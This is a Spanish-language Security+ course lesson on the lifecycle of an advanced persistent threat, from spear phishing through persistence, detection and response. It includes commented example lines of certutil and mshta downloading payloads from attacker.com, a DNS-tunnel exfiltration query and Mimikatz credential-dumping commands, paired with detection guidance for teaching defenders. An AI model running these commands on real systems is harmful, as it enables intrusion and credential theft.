Ciclo de vida de una APT: del acceso inicial a la persistencia
Siga una APT desde el acceso inicial mediante spear phishing hasta el establecimiento de C2, la escalada de privilegios y los mecanismos de persistencia que sobreviven a reinicios y reinstalaciones de imágenes.
Ciclo de vida de una APT: del acceso inicial a la persistencia es una lección gratuita de Security+ Academy en CoddyKit. Esta es la lección 1 de 4. Puedes leer la lección completa abajo gratuitamente — luego la practicas en el navegador con un editor de código integrado y un tutor de IA 24/7. Forma parte de la ruta de aprendizaje de Security+ Academy, y tu progreso se sincroniza en la web y la app de CoddyKit. El curso de Security+ Academy incluye 4 lecciones en total.
¿Qué es una amenaza persistente avanzada?
Una amenaza persistente avanzada (APT) es una campaña de ciberataque sofisticada y prolongada, normalmente llevada a cabo por actores estatales o grupos delictivos con una financiación importante y objetivos estratégicos específicos. Sus tres características definitorias son: Avanzada: utiliza malware personalizado, vulnerabilidades de día cero y técnicas novedosas; Persistente: mantiene una presencia encubierta durante meses o años, no se trata de una operación rápida y oportunista; Amenaza: es un ataque coordinado y dirigido contra una organización concreta. Entre los grupos APT conocidos se encuentran APT28 (Fancy Bear), vinculado al GRU de Rusia; APT41, vinculado a China; y Lazarus Group, vinculado a Corea del Norte.
Acceso inicial: cómo entran las APT
Las campañas de APT suelen comenzar con una de varias técnicas de acceso inicial conocidas y probadas. El spear phishing con archivos adjuntos armados o enlaces para robar credenciales es el método más habitual; el correo electrónico parece proceder de un compañero o socio de confianza. El compromiso de la cadena de suministro (como en SolarWinds/SUNBURST) inserta código malicioso en actualizaciones de software de confianza. La explotación de servicios expuestos a Internet (dispositivos VPN, servidores de Exchange y aplicaciones web) se realiza mediante CVE para las que no se han instalado parches. Los ataques de abrevadero comprometen sitios web que visitan con frecuencia los empleados de la organización objetivo y proporcionan exploits de descarga automática a los visitantes.
Ejecución: ejecución de la primera carga útil
Después de obtener el acceso inicial, el atacante debe ejecutar su primera carga útil en el sistema objetivo. Las APT prefieren técnicas que se confunden con la actividad normal del sistema: macros maliciosas en documentos de Office que se ejecutan cuando la víctima habilita el contenido; archivos HTML Application (HTA) que ejecutan scripts al abrirse; binarios Living-off-the-Land (LOLBins): uso de herramientas legítimas de Windows como mshta.exe, certutil.exe, regsvr32.exe o wscript.exe para ejecutar código del atacante y eludir las listas de aplicaciones permitidas. Estas técnicas dificultan distinguir las cargas útiles iniciales de la actividad legítima del sistema.
# Example LOLBin abuse: certutil used to download payload
# certutil.exe -urlcache -split -f http://attacker.com/payload.exe payload.exe
# Example: mshta executing remote HTA
# mshta.exe http://attacker.com/malicious.hta
# Detection: alert on certutil/mshta with network connectionsEstablecimiento de C2: comunicación con el atacante
Una vez ejecutada la carga útil inicial, esta establece un canal de mando y control (C2) con la infraestructura del atacante. Las APT modernas utilizan técnicas diseñadas para evadir la detección: HTTPS hacia dominios similares que imitan servicios cloud legítimos (Teams, OneDrive, GitHub); túneles DNS: codificación de comandos en consultas de registros TXT de DNS que parecen tráfico DNS normal; algoritmos de generación de dominios (DGA) que producen cada día un dominio C2 nuevo a partir de una semilla, lo que vuelve ineficaz el bloqueo de dominios; y C2 basado en el principio de living-off-the-land, que utiliza plataformas cloud legítimas (la API de Slack, Google Sheets o Twitter) como canal de comunicación.
# DNS tunneling detection: look for unusually long DNS queries
# Normal DNS query: www.google.com (13 chars)
# DNS tunnel query: 4f72d3a1b9c2e5f8.exfil.attacker.com (38 chars of encoded data)
# Zeek/Bro detection rule concept:
# alert dns (dns.qname length > 50)Descubrimiento: reconocimiento del entorno
Después de establecer el C2, los actores de APT realizan un reconocimiento interno para comprender el entorno antes de continuar. Esto incluye: enumeración de Active Directory mediante herramientas como BloodHound para trazar relaciones de confianza e identificar objetivos de alto valor; análisis de red para identificar hosts activos, servicios y puertos abiertos; descubrimiento de credenciales mediante la búsqueda en sistemas de archivos de archivos de configuración, bases de datos de contraseñas o credenciales almacenadas en navegadores; y enumeración de identidades para identificar cuentas con privilegios, cuentas de servicio y estaciones de trabajo de administradores. La mayor parte de la actividad de descubrimiento utiliza herramientas nativas de Windows (net user /domain, ipconfig, nltest) para evitar la detección.
# Native Windows commands used by APTs for discovery
# net user /domain # list domain users
# net group 'Domain Admins' /domain # list domain admins
# ipconfig /all # network configuration
# netstat -ano # active network connections
# tasklist /v # running processesEscalada de privilegios: obtención de acceso de administrador
Por lo general, las APT obtienen el acceso inicial con credenciales de usuario limitadas y deben elevar privilegios para alcanzar sus objetivos. Entre las vías de escalada habituales se incluyen: robo de credenciales de la memoria mediante Mimikatz (extracción de hashes NTLM de la memoria del proceso LSASS); Kerberoasting (solicitud de tickets de servicio para cuentas de servicio y crackeo sin conexión); explotación de servicios mal configurados con permisos débiles (rutas inseguras a binarios de servicios, secuestro de DLL); e suplantación de tokens para robar el token de autenticación de un proceso con privilegios. Las técnicas para eludir el Control de cuentas de usuario (UAC) permiten pasar de un administrador estándar a SYSTEM sin activar un aviso de UAC.
# Mimikatz: dump credentials from LSASS memory
# (defender perspective - what attackers run)
# privilege::debug
# sekurlsa::logonpasswords
# Detection: alert on LSASS memory reads by non-system processes
# Windows Event ID 4656/4663: access to LSASS processMecanismos de persistencia: sobrevivir a los reinicios
Las APT invierten mucho en mecanismos de persistencia que sobrevivan a los reinicios y a la reinstalación de imágenes, porque el acceso inicial puede haber sido difícil y costoso de conseguir. Entre las técnicas habituales de persistencia en Windows se encuentran: claves de ejecución del Registro (HKLM\Software\Microsoft\Windows\CurrentVersion\Run); tareas programadas que ejecutan malware con una periodicidad determinada; servicios de Windows que se inician automáticamente; suscripciones a eventos de WMI (difíciles de detectar y resistentes a la mayoría de los esfuerzos de limpieza); secuestro del orden de búsqueda de DLL; e implantes de arranque o previos al sistema operativo (implantes de firmware UEFI que sobreviven a las reinstalaciones del sistema operativo, utilizados por Equation Group y actores vinculados a la NSA).
# Common persistence locations to monitor
# Registry:
# HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# HKLM\System\CurrentControlSet\Services
# Check scheduled tasks for suspicious entries
# schtasks /query /fo LIST /v | findstr 'Task Name\|Run As User\|Task To Run'Evasión de defensas: ocultarse a plena vista
Las APT emplean una amplia evasión de defensas para evitar que las detecten las herramientas de seguridad de endpoints y los analistas. Entre las técnicas se incluyen: inyección de procesos — inyectar código malicioso en procesos legítimos como explorer.exe o svchost.exe para que el malware se ejecute con el nombre de un proceso confiable; timestomping — modificar las marcas de tiempo de los archivos para que parezca que los archivos maliciosos existen desde hace años; eliminación y manipulación de registros — borrar los registros de eventos de Windows para eliminar pruebas; abuso de certificados de firma de código — firmar el malware con certificados legítimos robados; y ejecución en memoria (malware sin archivos), que nunca toca el disco, donde lo detectaría un antivirus basado en archivos.
Exfiltración: robo encubierto de datos
Las APT gestionan cuidadosamente la exfiltración de datos para evitar activar los controles DLP y la detección de anomalías de ancho de banda. Entre las técnicas se incluyen: preparación de datos — recopilar los datos objetivo en un archivo comprimido cifrado antes de exfiltrarlos en pequeños fragmentos durante varios días; exfiltración mediante HTTPS a servicios de almacenamiento en la nube (OneDrive, Dropbox) permitidos por las reglas del firewall corporativo; esteganografía — ocultar datos dentro de archivos de imagen; y exfiltración basada en el tiempo durante el horario laboral para mezclarse con el tráfico legítimo. Las APT exfiltran únicamente lo que necesitan (propiedad intelectual de gran valor, credenciales y planes estratégicos) en lugar de copiarlo todo en bloque, lo que minimiza su huella y la probabilidad de detección.
Detección de actividad APT: indicadores clave
La detección de APT requiere mirar más allá de las alertas individuales para identificar patrones de actividad relacionada a lo largo de toda la cadena de ataque. Entre los indicadores clave se incluyen: relaciones inusuales entre procesos padre e hijo (por ejemplo, Word iniciando PowerShell); comandos codificados de PowerShell o descargas desde Internet; tareas programadas o servicios creados en horarios inusuales; acceso a la memoria de LSASS por parte de procesos que no son del sistema; movimiento lateral mediante SMB o WMI desde estaciones de trabajo; y consultas DNS salientes inusuales con subdominios de gran longitud. El MITRE ATT&CK Navigator permite a los defensores asignar las técnicas detectadas a la matriz ATT&CK e identificar brechas en su cobertura de detección.
# Splunk query: detect PowerShell encoded command execution
# index=windows source=WinEventLog:Security EventCode=4688
# | search NewProcessName='*powershell*' CommandLine='*-enc*'
# | table _time, ComputerName, SubjectUserName, CommandLineRespuesta ante APT: contención sin alertar al atacante
Responder ante una APT activa requiere un equilibrio cuidadoso: contener la amenaza sin alertar al atacante. Una contención prematura (bloquear el tráfico de C2 o deshabilitar cuentas) puede provocar que la APT active cargas destructivas o acelere la exfiltración. Entre las prácticas recomendadas se incluyen: supervisar de forma encubierta mientras se recopila inteligencia; segmentar gradualmente los hosts infectados mediante reglas del firewall sin bloquear C2; implementar tecnologías de engaño (honeytokens y cuentas canario) para supervisar la actividad del atacante; y coordinarse con las fuerzas del orden antes de realizar acciones de contención importantes. La remediación completa requiere identificar todos los mecanismos de persistencia y las cuentas comprometidas: un solo implante no detectado basta para que el atacante regrese.
Comprobación rápida
Ponga a prueba su comprensión de los conceptos de CompTIA Security+ (SY0-701) tratados en esta lección.
Recapitulación de la lección
En esta lección ha aprendido que: las APT son campañas avanzadas, persistentes y dirigidas que normalmente operan durante meses mediante spear phishing, ataques a la cadena de suministro o explotación de vulnerabilidades para obtener el acceso inicial; las APT utilizan LOLBins y servicios legítimos en la nube para C2 con el fin de mezclarse con el tráfico normal y evadir la detección; y los mecanismos de persistencia abarcan desde las claves de ejecución del Registro hasta los implantes de firmware UEFI, siendo las suscripciones de WMI especialmente difíciles de detectar y remediar. A continuación, exploraremos técnicas de movimiento lateral, como Pass-the-Hash y Pass-the-Ticket.
Preguntas frecuentes
¿La lección «Ciclo de vida de una APT: del acceso inicial a la persistencia» es gratis?
Sí — el texto completo de «Ciclo de vida de una APT: del acceso inicial a la persistencia» es gratis para leer aquí en la web. Para practicarla de forma interactiva (editor de código integrado y tutor de IA 24/7) y desbloquear el resto del curso de Security+ Academy, actualiza a CoddyKit PRO. El curso de Security+ Academy incluye 4 lecciones en total.
¿Qué aprenderé en «Ciclo de vida de una APT: del acceso inicial a la persistencia»?
Siga una APT desde el acceso inicial mediante spear phishing hasta el establecimiento de C2, la escalada de privilegios y los mecanismos de persistencia que sobreviven a reinicios y reinstalaciones d… Practicas Security+ Academy con código real que ejecutas directamente en el navegador, y un tutor de IA 24/7 responde tus preguntas mientras trabajas en la lección.
¿Necesito experiencia previa para empezar Security+ Academy?
No se requiere experiencia previa. Security+ Academy en CoddyKit está estructurado para principiantes hasta estudiantes avanzados, así que puedes empezar aquí o desde el inicio y avanzar a tu ritmo. Esta es la lección 1 de 4.
¿Cuánto tiempo toma la lección «Ciclo de vida de una APT: del acceso inicial a la persistencia»?
La mayoría de las lecciones de CoddyKit toman alrededor de 5–10 minutos. Cada una es compacta e interactiva, así que avanzas constantemente y retomas exactamente por donde dejaste en la web y la app.
¿Puedo escribir y ejecutar código en esta lección de Security+ Academy?
Sí. Cada lección de Security+ Academy incluye un editor de código integrado, así que escribes y ejecutas código real directamente en tu navegador y obtienes retroalimentación instantánea de IA — sin configuración local necesaria.
Todas las lecciones de este curso
- Ciclo de vida de una APT: del acceso inicial a la persistencia
- Movimiento lateral: Pass-the-Hash y Pass-the-Ticket
- Kerberoasting y ataques Golden Ticket
- Marco MITRE ATT&CK para detección y respuesta